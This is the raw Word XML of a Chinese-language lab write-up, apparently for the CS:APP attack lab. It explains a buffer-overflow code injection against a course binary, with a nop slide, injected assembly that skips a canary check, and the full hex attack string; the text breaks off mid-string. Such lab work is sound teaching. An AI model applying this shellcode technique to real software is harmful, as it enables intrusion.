    <w:p w14:paraId="64CF5E63" w14:textId="2B7F3A20" w:rsidR="004E55C0" w:rsidRDefault="004E55C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE5B60A" wp14:editId="071FFBD8">
            <wp:extent cx="5274310" cy="4982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63BE" w14:textId="72F91B37" w:rsidR="00356CE3" w:rsidRDefault="00356CE3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>etbufn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码可以发现为输入字符串分配了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的空间，这个空间可以存放大量的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指令。</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>estn</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在调用</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>etbufn</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前将一个</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>nique value</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存在了</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>bp-8</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置，在调用</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>etbufn</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后检查了这个值的正确性，相当于是是一个金丝雀。为了绕过它，我们在调用完</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>etbufn</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，跳过金丝雀的检查，直接返回到</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:t>x401255</w:t>
      </w:r>
      <w:r w:rsidR="004E55C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C125D8F" w14:textId="41E3F9AD" w:rsidR="001872F8" w:rsidRDefault="001872F8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此编写得到的</w:t>
      </w:r>
      <w:r w:rsidR="00AF273F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x100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指令用于做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>op slide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8192B" w14:textId="0DB092FD" w:rsidR="001872F8" w:rsidRDefault="00557A1A">
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="001872F8">
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BBA0A8" w14:textId="0A251F0A" w:rsidR="001872F8" w:rsidRDefault="00557A1A">
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="001872F8">
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C14729" w14:textId="25B6A96F" w:rsidR="001872F8" w:rsidRDefault="001872F8">
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8EC5E4" w14:textId="0A808599" w:rsidR="001872F8" w:rsidRDefault="00557A1A">
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="001872F8">
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1750B56E" w14:textId="74F91AF2" w:rsidR="001872F8" w:rsidRPr="00FF258A" w:rsidRDefault="00935559" w:rsidP="00935559">
      <w:r w:rsidRPr="00935559">
        <w:t>movl $0x2e561bea, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144A9E1" w14:textId="77777777" w:rsidR="00FF258A" w:rsidRPr="00FF258A" w:rsidRDefault="00FF258A" w:rsidP="00FF258A">
      <w:r w:rsidRPr="00FF258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF258A">
        <w:t>ea 0x10(%rsp), %rbp  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF258A">
        <w:t>恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF258A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF258A">
        <w:t>bp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BBD03" w14:textId="53898528" w:rsidR="00935559" w:rsidRDefault="00935559" w:rsidP="00935559">
      <w:r w:rsidRPr="00935559">
        <w:t>mov %eax, -4(%rbp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD912D1" w14:textId="76715955" w:rsidR="00935559" w:rsidRDefault="00935559" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ushq $</w:t>
      </w:r>
      <w:r w:rsidRPr="00935559">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00935559">
        <w:t>x401255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D05DD" w14:textId="58B3CD96" w:rsidR="00935559" w:rsidRDefault="00935559" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2D4E7" w14:textId="77777777" w:rsidR="00935559" w:rsidRDefault="00935559" w:rsidP="00935559"/>
    <w:p w14:paraId="18A9CD4C" w14:textId="08D0C3F2" w:rsidR="00935559" w:rsidRDefault="00AF273F" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时，构造的恶意字符串将返回地址覆盖为</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF273F">
        <w:t>0x556837d0</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从上面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次测试中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>sp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选取了最大的一个</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，希望能命中其中的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>op</w:t>
      </w:r>
      <w:r w:rsidR="00557A1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF9DFC6" w14:textId="767FFDE3" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>因此先构造一次恶意字符串如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A8CE32" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FB4A40" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C5D48" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A"/>
    <w:p w14:paraId="3F735970" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t>/* 0x100 rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B0610" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w: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</w:r>
    </w:p>
    <w:p w14:paraId="3E646EA0" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A"/>
    <w:p w14:paraId="2DF4CFA9" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF5093" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352EA7F" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A"/>
    <w:p w14:paraId="7EFAF4D5" w14:textId="77777777" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BE26E" w14:textId="7C8F8264" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00557A1A">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EB44E" w14:textId="104C1608" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="615A5300" wp14:editId="38898F52">
            <wp:extent cx="527431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F132" w14:textId="275559F5" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过一次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测试，发现真的命中了其中的一个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，并且还可以继续往下执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D98A11" w14:textId="09DFABD6" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64CFF84C" wp14:editId="66419F4E">
            <wp:extent cx="5274310" cy="2607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548" w14:textId="0BC16E55" w:rsidR="00557A1A" w:rsidRDefault="00557A1A" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初步设计的恶意字符串是用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来填充恶意代码的，通过调试发现这样的代码有机会能命中恶意代码，于是我们就在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刚刚结束，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刚刚开始的位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是图中框起来的位置</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始编写我们的恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B25FD7" w14:textId="198DCE2C" w:rsidR="00557A1A" w:rsidRDefault="00E43E4E" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在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中编写汇编代码并编译得到如下结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702B2CEC" w14:textId="78EACA4F" w:rsidR="00E43E4E" w:rsidRDefault="00FF258A" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62602E56" wp14:editId="4029B5AA">
            <wp:extent cx="5274310" cy="819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71B" w14:textId="1E1B95D0" w:rsidR="00E43E4E" w:rsidRDefault="00E43E4E" w:rsidP="00935559">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于是</w:t>
      </w:r>
      <w:r w:rsidR="00F9211D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们得到如下攻击字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704FA42" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55017A89" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t xml:space="preserve">90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C6BB54" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="470D4C06" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A5918" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8E288" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* lea 0x10(%rsp), %rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35075C11" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>48 8d ac 24 10 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663B7C9" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* mov %eax, -4(%rbp) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8EA263" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>89 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF8A047" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* pushq $0x401255 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929CEB5" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>68 55 12 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EBECF8" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE9933" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877E85C" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="6B19D90D" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8BA70" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w: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</w:r>
    </w:p>
    <w:p w14:paraId="39053820" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="1846EA83" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F509E" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4C3F8" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="003EE3A1" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F03A3" w14:textId="6A09E0D8" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803A02B" w14:textId="5E2456C7" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="3322033C" w14:textId="34BE4319" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次输入，因此将上述字符串重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次，每两次之间用一个换行符连接，换行符的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码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以得到本题的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0220F40C" w14:textId="453F1B4B" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="03C2DD5D" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2EE48" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t xml:space="preserve">90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C3486" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="7E27AF86" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5385A662" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494CDD6F" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* lea 0x10(%rsp), %rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7D161" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>48 8d ac 24 10 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068838DA" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* mov %eax, -4(%rbp) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9C908" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>89 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1F679" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* pushq $0x401255 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67794D22" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>68 55 12 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390EEA3" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1FC286" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F766A52" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="4CD984E2" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCBBBAD" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w: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</w:r>
    </w:p>
    <w:p w14:paraId="55EBB310" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="4E415723" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8A9E4" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A50F1" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="41E00178" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A54337" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64108106" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="6832C088" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E111D2F" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="719996F9" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41B4E3" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t xml:space="preserve"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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC527A0" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="798E2A0B" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFF130" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
